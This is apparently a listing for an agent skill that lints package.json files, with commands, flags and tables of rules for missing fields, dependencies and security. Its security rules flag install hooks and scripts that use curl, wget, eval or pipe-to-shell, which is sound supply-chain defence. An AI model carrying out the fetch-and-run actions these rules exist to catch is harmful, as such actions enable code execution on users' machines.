Install
openclaw skills install @charlie-morrison/package-json-linterLint and validate package.json files for common mistakes, missing fields, security issues, and best practices. Use when asked to lint, validate, audit, or check package.json files, Node.js project configs, or npm package metadata. Triggers on "lint package.json", "check package", "validate npm", "audit package.json", "package issues".
openclaw skills install @charlie-morrison/package-json-linterLint package.json files for missing fields, dependency issues, security risks, and best practices violations.
All commands use the bundled Python script at scripts/package_json_linter.py.
python3 scripts/package_json_linter.py lint <file-or-directory> [--strict] [--format text|json|markdown]
Runs all lint rules against one or more package.json files. If given a directory, scans for package.json files recursively (excluding node_modules).
Flags:
--strict — exit code 1 on any warning (not just errors)--format — output format: text (default), json, markdownpython3 scripts/package_json_linter.py security <file-or-directory> [--format text|json|markdown]
Checks for supply chain risks: postinstall/preinstall/install scripts, and scripts containing curl, wget, eval, or piping to shell.
python3 scripts/package_json_linter.py scripts <file-or-directory> [--format text|json|markdown]
Analyzes the scripts section for missing common scripts (test, start, build), placeholder test scripts, dependency issues, and deprecated packages.
python3 scripts/package_json_linter.py validate <file-or-directory> [--strict] [--format text|json|markdown]
Validates required fields (name, version, description), semver format, npm naming rules, dependency issues, and best practice fields.
| Rule | Severity | Description |
|---|---|---|
missing-name | error | No name field |
missing-version | error | No version field |
invalid-name | error | Name doesn't match npm naming rules |
invalid-version | error | Version not valid semver |
missing-description | warning | No description field |
| Rule | Severity | Description |
|---|---|---|
wildcard-dependency | error | Version is *, empty, or latest |
git-dependency | warning | Points to git URL (fragile) |
file-dependency | warning | Uses file: protocol |
pinned-dependency | info | All deps pinned to exact versions |
duplicate-dependency | warning | Same package in deps and devDeps |
deprecated-package | warning | Known deprecated package (~20 tracked) |
| Rule | Severity | Description |
|---|---|---|
postinstall-script | warning | Supply chain risk |
preinstall-script | warning | Supply chain risk |
install-script | warning | Supply chain risk |
suspicious-script | warning | Contains curl/wget/eval/pipe-to-shell |
| Rule | Severity | Description |
|---|---|---|
missing-license | warning | No license field |
missing-repository | info | No repository field |
missing-engines | info | No engines field |
missing-keywords | info | No keywords field |
missing-main | info | No main or exports field |
missing-scripts | info | No scripts section |
non-https-url | warning | URLs not using HTTPS |
0 — no errors found1 — errors found (or warnings in --strict mode)text — human-readable, one issue per line (default)json — structured JSON with summary countsmarkdown — table format for reports and PRs